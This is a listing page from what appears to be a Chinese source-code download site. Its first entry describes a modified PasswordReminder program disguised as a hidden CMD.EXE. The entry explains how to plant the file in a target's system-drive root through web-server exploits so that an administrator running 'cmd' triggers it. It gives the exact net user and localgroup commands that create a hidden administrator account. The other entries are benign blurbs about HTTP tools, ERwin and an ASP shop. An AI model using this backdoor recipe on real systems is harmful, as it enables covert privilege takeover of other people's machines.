你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
http协议下的文件传输程序
上传时间: 2015-01-12
上传用户:784533221
机器人的实时控制。VxWork,Windows系统在机器人控制方面的应用。链接来自 http://www.automationit.hut.fi
标签: automationit Windows VxWork http
上传时间: 2015-01-12
上传用户:Miyuki
ERWIN绝好的数据库建模工具,可以把数据模型导入数据库如sql server foxpro等这里是方法指南更多内容可以去http://erwin.softwarechn.com/_script/showfull.asp?Board=method&Tabname=erwin
标签: softwarechn server foxpro script
上传时间: 2013-12-06
上传用户:c12228
软件名称 锐通大型电子购物系统 运行环境 ASP环境 软件语言 国产软件 整理时间 2004-8-15 15:07:33 软件类型 ASP源码 程序主页 http://xrlt.yeah.net 授权方式 免费软件 联系作者 http://www.idler-et.com/comic-et/home/ 软件大小 663 KB 界面预览 没有预览图片 软件等级 解压密码 本站默认解压密码:www.ttxx.com 下载统计 本日下载:3 本周下载:4 本月下载:11 总共下载:170 ∷软件简介∷ 完全仿照8848网站设计的网上购物系统,功能真够强大,不必做太多的说明,如果你去过8848,便会对此有比较深刻的了解。
上传时间: 2013-12-23
上传用户:xzt
http代理服务器
上传时间: 2014-01-17
上传用户:sunjet
--八、设置HTTP应答头.
标签: HTTP
上传时间: 2015-01-19
上传用户:coeus
基于Winsock2的支持断点续传和SOCKS代理的HTTP下载类 CHttpDownload
标签: CHttpDownload Winsock2 SOCKS HTTP
上传时间: 2013-12-18
上传用户:希酱大魔王
包含常用Internet协议TCP,UDP、HTTP、FTP、Telnet等,此版本新增加一个THttpServ构件
上传时间: 2014-08-16
上传用户:851197153
利用java开发http客户端的程序
上传时间: 2013-12-22
上传用户:sxdtlqqjl